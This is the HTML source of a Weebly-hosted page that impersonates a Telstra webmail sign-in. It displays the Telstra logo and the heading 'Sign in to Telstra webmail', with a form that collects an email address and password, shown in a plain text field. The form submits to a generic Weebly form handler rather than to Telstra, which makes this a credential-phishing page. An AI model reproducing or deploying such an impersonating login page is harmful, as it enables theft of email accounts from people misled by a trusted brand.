<!DOCTYPE html>
<html lang="en">
	<head>
		<title>Telstra Home Page</title><meta property="og:site_name" content="" />
<meta property="og:title" content="My Site" />
<meta property="og:description" content="​ Sign in to Telstra webmail" />
<meta property="og:image" content="https://telstrappointt.weebly.com/uploads/1/5/2/6/152609216/published/telstra-new-logo.png?1743028173" />
<meta property="og:url" content="https://telstrappointt.weebly.com/" />



<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1.0;">

		
		<link id="wsite-base-style" rel="stylesheet" type="text/css" href="//cdn2.editmysite.com/css/sites.css?buildTime=1743014556" />
<link rel="stylesheet" type="text/css" href="//cdn2.editmysite.com/css/old/fancybox.css?1743014556" />
<link rel="stylesheet" type="text/css" href="//cdn2.editmysite.com/css/social-icons.css?buildtime=1743014556" media="screen,projection" />
<link rel="stylesheet" type="text/css" href="/files/main_style.css?1743028902" title="wsite-theme-css" />
<link href='//cdn2.editmysite.com/fonts/Lato/font.css?2' rel='stylesheet' type='text/css' />
<link href='//cdn2.editmysite.com/fonts/Montserrat/font.css?2' rel='stylesheet' type='text/css' />
<link href='//cdn2.editmysite.com/fonts/Lora/font.css?2' rel='stylesheet' type='text/css' />

<style type='text/css'>
.wsite-elements.wsite-not-footer:not(.wsite-header-elements) div.paragraph, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) p, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-block .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-description, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, #wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {}
#wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {}
.wsite-elements.wsite-footer div.paragraph, .wsite-elements.wsite-footer p, .wsite-elements.wsite-footer .product-block .product-title, .wsite-elements.wsite-footer .product-description, .wsite-elements.wsite-footer .wsite-form-field label, .wsite-elements.wsite-footer .wsite-form-field label{}
.wsite-elements.wsite-not-footer:not(.wsite-header-elements) h2, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-long .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-large .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-small .product-title, #wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
#wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
.wsite-elements.wsite-footer h2, .wsite-elements.wsite-footer .product-long .product-title, .wsite-elements.wsite-footer .product-large .product-title, .wsite-elements.wsite-footer .product-small .product-title{}
#wsite-title {}
.wsite-menu-default a {}
.wsite-menu a {}
.wsite-image div, .wsite-caption {}
.galleryCaptionInnerText {}
.fancybox-title {}
.wslide-caption-text {}
.wsite-phone {}
.wsite-headline,.wsite-header-section .wsite-content-title {}
.wsite-headline-paragraph,.wsite-header-section .paragraph {}
.wsite-button-inner {}
.wsite-not-footer blockquote {}
.wsite-footer blockquote {}
.blog-header h2 a {}
#wsite-content h2.wsite-product-title {}
.wsite-product .wsite-product-price a {}
@media screen and (min-width: 767px) {.wsite-elements.wsite-not-footer:not(.wsite-header-elements) div.paragraph, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) p, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-block .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-description, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, #wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {}
#wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {}
.wsite-elements.wsite-footer div.paragraph, .wsite-elements.wsite-footer p, .wsite-elements.wsite-footer .product-block .product-title, .wsite-elements.wsite-footer .product-description, .wsite-elements.wsite-footer .wsite-form-field label, .wsite-elements.wsite-footer .wsite-form-field label{}
.wsite-elements.wsite-not-footer:not(.wsite-header-elements) h2, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-long .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-large .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-small .product-title, #wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
#wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
.wsite-elements.wsite-footer h2, .wsite-elements.wsite-footer .product-long .product-title, .wsite-elements.wsite-footer .product-large .product-title, .wsite-elements.wsite-footer .product-small .product-title{}
#wsite-title {}
.wsite-menu-default a {}
.wsite-menu a {}
.wsite-image div, .wsite-caption {}
.galleryCaptionInnerText {}
.fancybox-title {}
.wslide-caption-text {}
.wsite-phone {}
.wsite-headline,.wsite-header-section .wsite-content-title {}
.wsite-headline-paragraph,.wsite-header-section .paragraph {}
.wsite-button-inner {}
.wsite-not-footer blockquote {}
.wsite-footer blockquote {}
.blog-header h2 a {}
#wsite-content h2.wsite-product-title {}
.wsite-product .wsite-product-price a {}
}</style>
<style>
.wsite-background {background-image: url("/uploads/1/5/2/6/152609216/background-images/784490231.jpg") !important;background-repeat: no-repeat !important;background-position: 50% 50% !important;background-size: 100% !important;background-color: transparent !important;background: inherit;}
body.wsite-background {background-attachment: fixed !important;}.wsite-background.wsite-custom-background{ background-size: cover !important}
</style>
		<script src='/files/templateArtifacts.js?1743028902'></script>
<script>
var STATIC_BASE = '//cdn1.editmysite.com/';
var ASSETS_BASE = '//cdn2.editmysite.com/';
var STYLE_PREFIX = 'wsite';
</script>
<script src='https://cdn2.editmysite.com/js/jquery-1.8.3.min.js'></script>

<script type="text/javascript" src="//cdn2.editmysite.com/js/lang/en/stl.js?buildTime=1743014556&"></script>
<script src="//cdn2.editmysite.com/js/site/main.js?buildTime=1743014556"></script><script type="text/javascript">
		function initCustomerAccountsModels() {
					(function(){_W.setup_rpc({"url":"\/ajax\/api\/JsonRPC\/CustomerAccounts\/","actions":{"CustomerAccounts":[{"name":"login","len":2,"multiple":false,"standalone":false},{"name":"logout","len":0,"multiple":false,"standalone":false},{"name":"getSessionDetails","len":0,"multiple":false,"standalone":false},{"name":"getAccountDetails","len":0,"multiple":false,"standalone":false},{"name":"getOrders","len":0,"multiple":false,"standalone":false},{"name":"register","len":4,"multiple":false,"standalone":false},{"name":"emailExists","len":1,"multiple":false,"standalone":false},{"name":"passwordReset","len":1,"multiple":false,"standalone":false},{"name":"passwordUpdate","len":3,"multiple":false,"standalone":false},{"name":"validateSession","len":1,"multiple":false,"standalone":false}]},"namespace":"_W.CustomerAccounts.RPC"});
_W.setup_model_rpc({"rpc_namespace":"_W.CustomerAccounts.RPC","model_namespace":"_W.CustomerAccounts.BackboneModelData","collection_namespace":"_W.CustomerAccounts.BackboneCollectionData","bootstrap_namespace":"_W.CustomerAccounts.BackboneBootstrap","models":{"CustomerAccounts":{"_class":"CustomerAccounts.Model.CustomerAccounts","defaults":null,"validation":null,"types":null,"idAttribute":null,"keydefs":null}},"collections":{"CustomerAccounts":{"_class":"CustomerAccounts.Collection.CustomerAccounts"}},"bootstrap":[]});
})();
		}
		if(document.createEvent && document.addEventListener) {
			var initEvt = document.createEvent('Event');
			initEvt.initEvent('customerAccountsModelsInitialized', true, false);
			document.dispatchEvent(initEvt);
		} else if(document.documentElement.initCustomerAccountsModels === 0){
			document.documentElement.initCustomerAccountsModels++
		}
		</script>
		<script type="text/javascript"> _W = _W || {}; _W.securePrefix='telstrappointt.weebly.com'; </script><script>_W = _W || {};
			_W.customerLocale = "en_US";
			_W.storeName = null;
			_W.isCheckoutReskin = false;
			_W.storeCountry = "NG";
			_W.storeCurrency = "USD";
			_W.storeEuPrivacyPolicyUrl = "";
			com_currentSite = "255315442425258915";
			com_userID = "152609216";</script><script type="text/javascript">_W.configDomain = "www.weebly.com";</script><script>_W.relinquish && _W.relinquish()</script>
<script type="text/javascript" src="//cdn2.editmysite.com/js/lang/en/stl.js?buildTime=1743014556&"></script><script> _W.themePlugins = {"navpane":{"condense":1024,"forced":0}};</script><script src='//cdn2.editmysite.com/js/site/theme-plugins.js?buildTime=1743014556'></script><script type="text/javascript"> _W.recaptchaUrl = "https://www.google.com/recaptcha/api.js"; </script>
		
		
	</head>
	<body class="splash-page  wsite-page-index  wsite-theme-light"><div id="header">
		<div class="container">
			<div class="icons">
				<div class="w-navpane-trigger hamburger">
					<span></span>
				</div>
			</div>
			<div class="logo"><span class="wsite-logo">

	
	<span class="wsite-title-placeholder">&nbsp;</span><span style="display:none">
	<span style="display:none">&nbsp;</span>
	</span>
	

</span></div>
			<div class="icons">
				
				
				<a href="#" class="close w-navpane-close"><span></span></a>
			</div>

		</div>
		<div id="navlist" class="w-navlist nav"><ul class="wsite-menu-default">
</ul>
</div>
		<div id="menu" class="slide-panel">
			<div id="nav" class="nav w-navpane">
				<div class="container"><ul class="wsite-menu-default">
</ul>
</div>
			</div>
		</div>
		<div id="search" class="slide-panel">
			<div class="container">Search by typing &amp; pressing enter</div>
		</div>
		<div id="cart" class="slide-panel">
			<div class="container"><h2>YOUR CART</h2></div>
		</div>
	</div>

	<div id="content">
		<div id="banner" class="wsite-background wsite-custom-background">
			<div class="banner-content">
				<div class="container"><div id="wsite-content" class="wsite-elements wsite-not-footer">
	<div><div class="wsite-multicol"><div class="wsite-multicol-table-wrap" style="margin:0 -15px;">
	<table class="wsite-multicol-table">
		<tbody class="wsite-multicol-tbody">
			<tr class="wsite-multicol-tr">
				<td class="wsite-multicol-col" style="width:20.393337937863%; padding:0 15px;">
					
						

<div class="wsite-spacer" style="height:50px;"></div>


					
				</td>				<td class="wsite-multicol-col" style="width:66.149098904689%; padding:0 15px;">
					
						

<div id="508173891671857060"><div><style type="text/css">
	#element-1039ce73-5d98-4909-aade-4c355b286b2b .colored-box-content {
  clear: both;
  float: left;
  width: 100%;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  -ms-box-sizing: border-box;
  box-sizing: border-box;
  background-color: rgba(244,247,248,0.1);
  padding-top: 60px;
  padding-bottom: 60px;
  padding-left: 0px;
  padding-right: 0px;
  -webkit-border-top-left-radius: 0px;
  -moz-border-top-left-radius: 0px;
  border-top-left-radius: 0px;
  -webkit-border-top-right-radius: 0px;
  -moz-border-top-right-radius: 0px;
  border-top-right-radius: 0px;
  -webkit-border-bottom-left-radius: 0px;
  -moz-border-bottom-left-radius: 0px;
  border-bottom-left-radius: 0px;
  -webkit-border-bottom-right-radius: 0px;
  -moz-border-bottom-right-radius: 0px;
  border-bottom-right-radius: 0px;
}

</style><div id="element-1039ce73-5d98-4909-aade-4c355b286b2b" data-platform-element-id="848857247979793891-1.0.1" class="platform-element-contents">
	<div class="colored-box">
    <div class="colored-box-content">
        <div style="width: auto"><div></div><div><div class="wsite-multicol"><div class="wsite-multicol-table-wrap" style="margin:0 -15px;">
	<table class="wsite-multicol-table">
		<tbody class="wsite-multicol-tbody">
			<tr class="wsite-multicol-tr">
				<td class="wsite-multicol-col" style="width:21.325361625646%; padding:0 15px;">
					
						

<div class="wsite-spacer" style="height:50px;"></div>


					
				</td>				<td class="wsite-multicol-col" style="width:59.221105595543%; padding:0 15px;">
					
						

<div><div class="wsite-image wsite-image-border-none " style="padding-top:10px;padding-bottom:10px;margin-left:0;margin-right:0;text-align:center">
<a>
<img src="/uploads/1/5/2/6/152609216/published/telstra-new-logo.png?1743028173" alt="Picture" style="width:auto;max-width:100%" />
</a>
<div style="display:block;font-size:90%"></div>
</div></div>

<div class="paragraph">&#8203;<strong><font size="6">Sign in to Telstra webmail</font></strong></div>

<div class="paragraph" style="text-align:center;"><span><font size="3">Sign in with your Telstra email address</font></span></div>

<div>
	<form enctype="multipart/form-data" action="//www.weebly.com/weebly/apps/formSubmit.php" method="POST" id="form-276782264677221679">
		<div id="276782264677221679-form-parent" class="wsite-form-container"
				 style="margin-top:10px;">
			<ul class="formlist" id="276782264677221679-form-list">
				<label class="wsite-form-label wsite-form-fields-required-label"><span class="form-required">*</span> Indicates required field</label><div><div class="wsite-form-field" style="margin:5px 0px 5px 0px;">
				<label class="wsite-form-label" for="input-868601356274056953">Telstra Email Address  <span class="form-required">*</span></label>
				<div class="wsite-form-input-container">
					<input aria-required="true" id="input-868601356274056953" class="wsite-form-input wsite-input wsite-input-width-370px" type="text" name="_u868601356274056953" />
				</div>
				<div id="instructions-868601356274056953" class="wsite-form-instructions" style="display:none;"></div>
			</div></div>

<div><div class="wsite-form-field" style="margin:5px 0px 5px 0px;">
				<label class="wsite-form-label" for="input-187253120986875521">Password <span class="form-required">*</span></label>
				<div class="wsite-form-input-container">
					<input aria-required="true" id="input-187253120986875521" class="wsite-form-input wsite-input wsite-input-width-370px" type="text" name="_u187253120986875521" />
				</div>
				<div id="instructions-187253120986875521" class="wsite-form-instructions" style="display:none;"></div>
			</div></div>
			</ul>
			
		</div>
		<div style="display:none; visibility:hidden;">
			<input type="hidden" name="wsite_subject" />
		</div>
		<div style="text-align:center; margin-top:10px; margin-bottom:10px;">
			<input type="hidden" name="form_version" value="2" />
			<input type="hidden" name="wsite_approved" id="wsite-approved" value="approved" />
			<input type="hidden" name="ucfid" value="276782264677221679" />
			<input type="hidden" name="recaptcha_token"/>
			<input type="submit" role="button" aria-label="Sign in" value="Sign in" style="position:absolute;top:0;left:-9999px;width:1px;height:1px" />
			<a class="wsite-button">
				<span class="wsite-button-inner">Sign in</span>
			</a>
		</div>
	</form>
	<div id="g-recaptcha-276782264677221679" class="recaptcha" data-size="invisible" data-recaptcha="0" data-sitekey="6Ldf5h8UAAAAAJFJhN6x2OfZqBvANPQcnPa8eb1C"></div>



</div>


					
				</td>				<td class="wsite-multicol-col" style="width:19.453532778812%; padding:0 15px;">
					
						

<div class="wsite-spacer" style="height:50px;"></div>


					
				</td>			</tr>
		</tbody>
	</table>
</div></div></div></div>
    </div>
</div>
</div>
<div style="clear:both;"></div><script type="text/javascript" class="element-script">function setupElement508173891671857060() {
	var requireFunc = window.platformElementRequire || window.require;

	// Relies on a global require, specific to platform elements
	requireFunc([
		'w-global',
		'underscore',
		'jquery',
		'backbone',
		'util/platform/elements/PlatformElement',
		'util/platform/elements/PlatformElementSettings'
	], function(
		_W,
		_,
		$,
		Backbone,
		PlatformElement,
		PlatformElementSettings
	) {
		var dependencies = null || [];
		var platform_element_id = "848857247979793891-1.0.1";

		if (typeof _W.loadedPlatformDependencies === 'undefined') {
			_W.loadedPlatformDependencies = [];
		}

		if (typeof _W.platformElements === 'undefined') {
			_W.platformElements = [];
		}

		if (typeof _W.platformElements[platform_element_id] === 'undefined') {
			_W.platformElements[platform_element_id] = {};
			_W.platformElements[platform_element_id].deferredObject = new $.Deferred();
			_W.platformElements[platform_element_id].deferredPromise = _W.platformElements[platform_element_id].deferredObject.promise();
		}

		if(_.intersection(_W.loadedPlatformDependencies, dependencies).length !== dependencies.length){
			_.reduce(dependencies, function(promise, nextScript){
				_W.loadedPlatformDependencies.push(nextScript);
				return promise.then(function(){
					return $.getScript(nextScript);
				});
			}, $().promise()).then(function(){
				_W.platformElements[platform_element_id].deferredObject.resolve();
			});
		}

		if (dependencies.length === 0){
			_W.platformElements[platform_element_id].deferredObject.resolve();
		}

		_W.platformElements[platform_element_id].deferredPromise.done(function(){
			var _ElementDefinition = /**
 * This is required for element rendering to be possible
 * @type {PlatformElement}
 */
(function() {
    var ColoredBox = PlatformElement.extend({

        initialize: function() {
        }

    });

    return ColoredBox;
})();

			if (typeof _ElementDefinition == 'undefined' || typeof _ElementDefinition == 'null') {
				var _ElementDefinition = PlatformElement.extend({});
			}

			var _Element = _ElementDefinition.extend({
				initialize: function() {
					// we still want to call the initialize function defined by the developer
					// however, we don't want to call it until placeholders have been replaced
					this.placeholderInterval = setInterval(function() {
						// so use setInterval to check for placeholders.
						if (this.$('.platform-element-child-placeholder').length == 0) {
							clearInterval(this.placeholderInterval);
							this.constructor.__super__.initialize.apply(this);
						}
					}.bind(this), 100);
				}
			});

			_Element.prototype.settings = new PlatformElementSettings({"top_padding_each":[{"top_padding_index":0},{"top_padding_index":1},{"top_padding_index":2},{"top_padding_index":3},{"top_padding_index":4},{"top_padding_index":5},{"top_padding_index":6},{"top_padding_index":7},{"top_padding_index":8},{"top_padding_index":9},{"top_padding_index":10},{"top_padding_index":11},{"top_padding_index":12},{"top_padding_index":13},{"top_padding_index":14},{"top_padding_index":15},{"top_padding_index":16},{"top_padding_index":17},{"top_padding_index":18},{"top_padding_index":19},{"top_padding_index":20},{"top_padding_index":21},{"top_padding_index":22},{"top_padding_index":23},{"top_padding_index":24},{"top_padding_index":25},{"top_padding_index":26},{"top_padding_index":27},{"top_padding_index":28},{"top_padding_index":29},{"top_padding_index":30},{"top_padding_index":31},{"top_padding_index":32},{"top_padding_index":33},{"top_padding_index":34},{"top_padding_index":35},{"top_padding_index":36},{"top_padding_index":37},{"top_padding_index":38},{"top_padding_index":39},{"top_padding_index":40},{"top_padding_index":41},{"top_padding_index":42},{"top_padding_index":43},{"top_padding_index":44},{"top_padding_index":45},{"top_padding_index":46},{"top_padding_index":47},{"top_padding_index":48},{"top_padding_index":49},{"top_padding_index":50},{"top_padding_index":51},{"top_padding_index":52},{"top_padding_index":53},{"top_padding_index":54},{"top_padding_index":55},{"top_padding_index":56},{"top_padding_index":57},{"top_padding_index":58},{"top_padding_index":59}],"bottom_padding_each":[{"bottom_padding_index":0},{"bottom_padding_index":1},{"bottom_padding_index":2},{"bottom_padding_index":3},{"bottom_padding_index":4},{"bottom_padding_index":5},{"bottom_padding_index":6},{"bottom_padding_index":7},{"bottom_padding_index":8},{"bottom_padding_index":9},{"bottom_padding_index":10},{"bottom_padding_index":11},{"bottom_padding_index":12},{"bottom_padding_index":13},{"bottom_padding_index":14},{"bottom_padding_index":15},{"bottom_padding_index":16},{"bottom_padding_index":17},{"bottom_padding_index":18},{"bottom_padding_index":19},{"bottom_padding_index":20},{"bottom_padding_index":21},{"bottom_padding_index":22},{"bottom_padding_index":23},{"bottom_padding_index":24},{"bottom_padding_index":25},{"bottom_padding_index":26},{"bottom_padding_index":27},{"bottom_padding_index":28},{"bottom_padding_index":29},{"bottom_padding_index":30},{"bottom_padding_index":31},{"bottom_padding_index":32},{"bottom_padding_index":33},{"bottom_padding_index":34},{"bottom_padding_index":35},{"bottom_padding_index":36},{"bottom_padding_index":37},{"bottom_padding_index":38},{"bottom_padding_index":39},{"bottom_padding_index":40},{"bottom_padding_index":41},{"bottom_padding_index":42},{"bottom_padding_index":43},{"bottom_padding_index":44},{"bottom_padding_index":45},{"bottom_padding_index":46},{"bottom_padding_index":47},{"bottom_padding_index":48},{"bottom_padding_index":49},{"bottom_padding_index":50},{"bottom_padding_index":51},{"bottom_padding_index":52},{"bottom_padding_index":53},{"bottom_padding_index":54},{"bottom_padding_index":55},{"bottom_padding_index":56},{"bottom_padding_index":57},{"bottom_padding_index":58},{"bottom_padding_index":59}],"background_color":"#f4f7f8","opacity":10,"top_left_radius":0,"top_right_radius":0,"bottom_left_radius":0,"bottom_right_radius":0,"top_padding":60,"bottom_padding":60,"left_padding":0,"right_padding":0});
			_Element.prototype.settings.page_element_id = "508173891671857060";

			_Element.prototype.element_id = "1039ce73-5d98-4909-aade-4c355b286b2b";
			_Element.prototype.user_id = "152609216";
			_Element.prototype.site_id = "255315442425258915";
			_Element.prototype.assets_path = "//marketplace.editmysite.com/uploads/b/marketplace-elements-848857247979793891-1.0.1/assets/";
			new _Element({
				el: '#element-1039ce73-5d98-4909-aade-4c355b286b2b'
			});
		});
	});

}

if (typeof document.documentElement.appReady == 'undefined') {
	document.documentElement.appReady = 0;
}

if (document.documentElement.appReady || (window.inEditor && window.inEditor())) {
	setupElement508173891671857060();
} else if (document.createEvent && document.addEventListener) {
	document.addEventListener('appReady', setupElement508173891671857060, false);
} else {
	document.documentElement.attachEvent('onpropertychange', function(event){
		if (event.propertyName == 'appReady') {
			setupElement508173891671857060();
		}
	});
}

</script></div></div>


					
				</td>				<td class="wsite-multicol-col" style="width:13.457563157448%; padding:0 15px;">
					
						

<div class="wsite-spacer" style="height:50px;"></div>


					
				</td>			</tr>
		</tbody>
	</table>
</div></div></div>
</div>
</div>
			</div>
		</div>

		<div id="footer">

<style type="text/css">
	@font-face {
		font-family: SQMarket-Medium;
		font-style: normal;
		font-weight: 500;
		src:
			url("//cdn2.editmysite.com/fonts/SQ_Market/sqmarket-medium.woff2") format("woff2"),
			url("//cdn2.editmysite.com/fonts/SQ_Market/sqmarket-medium.woff") format("woff");
	}
</style>

<div id="weebly-footer-signup-container-v3">
	<a
		href="https://www.weebly.com/signup?utm_source=internal&utm_medium=footer"
		target="_blank"
		class="signup-container-header"
		id="signup-link-href"
	>
		<div class="powered-by">
			<div class="footer-published-ab-powered-by">
				Powered by <span class="link weebly-icon"></span>
				<img class="footer-ab-published-toast-image" src="//cdn2.editmysite.com/images/site/footer/footer-toast-published-image-1.png">
				<span class="footer-ab-published-toast-text">Create your own unique website with customizable templates.</span>
				<span class="footer-ab-published-toast-button-wrapper">
					<button class="footer-published-ab-button">Get Started</button>
				</span>
			</div>
		</div>
	</a>
</div>

<script type="text/javascript" src="//cdn2.editmysite.com/js/site/footerSignup.js?buildTime=1743788187"></script>
<script type="text/javascript">
	if (document.readystate === 'complete') {
		Weebly.footer.setupContainer('cdn2.editmysite.com', '1743788187');
	} else {
		document.addEventListener('DOMContentLoaded', function() {
			Weebly.footer.setupContainer('cdn2.editmysite.com', '1743788187');
		});
	}
</script>
</div>
	</div>

	<div class="overlay w-navpane-close"></div>

	<script type="text/javascript" src="/files/theme/plugins.js?1743027537"></script>
	<script type="text/javascript" src="/files/theme/custom.js?1743027537"></script>
    <div id="customer-accounts-app"></div>
    <script src="//cdn2.editmysite.com/js/site/main-customer-accounts-site.js?buildTime=1743014556"></script>

		<script type="text/javascript">
	var _gaq = _gaq || [];
	_gaq.push(['_setAccount', 'UA-7870337-1']);
	_gaq.push(['_setDomainName', 'none']);
	_gaq.push(['_setAllowLinker', true]);

	(function() {
		var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
		ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
		// NOTE: keep the [1] if you replace this code. Otherwise cookie banner scripts won't be first on the page
		var s = document.getElementsByTagName('script')[1]; s.parentNode.insertBefore(ga, s);
	})();

	_W.Analytics = _W.Analytics || {'trackers': {}};
	_W.Analytics.trackers.wGA = '_gaq';
</script>

<script type="text/javascript" async=1>
	// NOTE: keep the getElementsByTagName(o)**[1]** if you replace this code. Otherwise cookie banner scripts won't be first on the page
	;(function(p,l,o,w,i,n,g){if(!p[i]){p.GlobalSnowplowNamespace=p.GlobalSnowplowNamespace||[];
			p.GlobalSnowplowNamespace.push(i);p[i]=function(){(p[i].q=p[i].q||[]).push(arguments)
			};p[i].q=p[i].q||[];n=l.createElement(o);g=l.getElementsByTagName(o)[1];n.async=1;
			n.src=w;g.parentNode.insertBefore(n,g)}}(window,document,'script','//cdn2.editmysite.com/js/wsnbn/snowday262.js','snowday'));

	var r = [99, 104, 101, 99, 107, 111, 117, 116, 46, 40, 119, 101, 101, 98, 108, 121, 124, 101, 100, 105, 116, 109, 121, 115, 105, 116, 101, 41, 46, 99, 111, 109];
	var snPlObR = function(arr) {
		var s = '';
		for (var i = 0 ; i < arr.length ; i++){
			s = s + String.fromCharCode(arr[i]);
		}
		return s;
	};
	var s = snPlObR(r);

	var regEx = new RegExp(s);

	_W.Analytics = _W.Analytics || {'trackers': {}};
	_W.Analytics.trackers.wSP = 'snowday';
	_W.Analytics.user_id = '152609216';
	_W.Analytics.site_id = '255315442425258915';


	(function(app_id, ec_hostname, discover_root_domain) {
		var track = window[_W.Analytics.trackers.wSP];
		if (!track) return;
		track('newTracker', app_id, ec_hostname, {
			appId: app_id,
			post: true,
			platform: 'web',
			discoverRootDomain: discover_root_domain,
			cookieName: '_snow_',
			contexts: {
				webPage: true,
				performanceTiming: true,
				gaCookies: true
			},
			crossDomainLinker: function (linkElement) {
				return regEx.test(linkElement.href);
			},
			respectDoNotTrack: true
		});
		track('trackPageView', _W.Analytics.user_id+':'+_W.Analytics.site_id, _W.Analytics.spContexts);
		track('crossDomainLinker', function (linkElement) {
			return regEx.test(linkElement.href);
		});
	})(
		'_wn',
		'ec.editmysite.com',
		false
	);
</script>





<script>
	(function(jQuery) {
		try {
			if (jQuery) {
				jQuery('div.blog-social div.fb-like').attr('class', 'blog-social-item blog-fb-like');
				var $commentFrame = jQuery('#commentArea iframe');
				if ($commentFrame.length > 0) {
					var frameHeight = jQuery($commentFrame[0].contentWindow.document).height() + 50;
					$commentFrame.css('min-height', frameHeight + 'px');
				}
				if (jQuery('.product-button').length > 0){
					jQuery(document).ready(function(){
						jQuery('.product-button').parent().each(function(index, product){
							if(jQuery(product).attr('target') == 'paypal'){
								if (!jQuery(product).find('> [name="bn"]').length){
									jQuery('<input>').attr({
										type: 'hidden',
										name: 'bn',
										value: 'DragAndDropBuil_SP_EC'
									}).appendTo(product);
								}
							}
						});
					});
				}
			}
			else {
				// Prototype
				$$('div.blog-social div.fb-like').each(function(div) {
					div.className = 'blog-social-item blog-fb-like';
				});
				$$('#commentArea iframe').each(function(iframe) {
					iframe.style.minHeight = '410px';
				});
			}
		}
		catch(ex) {}
	})(window._W && _W.jQuery);
</script>

<script>
	window._W.isEUUser = true;
	window._W.showCookieToAll = "";
</script>

<script>
	(function(jQuery) {
		try {
			function forceShowCcLinks() {
				var ccLinks = document.querySelector('.cc_links');
				if (!ccLinks) {
					return;
				}

				var ccLinksVisible = jQuery(ccLinks).is(':visible');
				if (ccLinksVisible) {
					return;
				}


				ccLinks.style.display = 'block';

				var ccParent = ccLinks.parentElement;

				var ccParentVisible = jQuery(ccParent).is(':visible');
				if (ccParentVisible) {
					return;
				}

				ccParent.style.display = 'block';

				var ccGrandparent = ccParent.parentElement;
				var ccGrandparentVisible = jQuery(ccGrandparent).is(':visible');
				if (ccGrandparentVisible) {
					return;
				}
				ccGrandparent.style.display = 'block';

			}

			function forceShowCcLinksForever() {
				var tenSeconds = 10000;
				forceShowCcLinks();
				setTimeout(forceShowCcLinksForever, tenSeconds);
			}

			jQuery(document).ready(forceShowCcLinksForever);
		}
		catch(ex) {}
	})(window._W && _W.jQuery);
</script>


	</body>
</html>
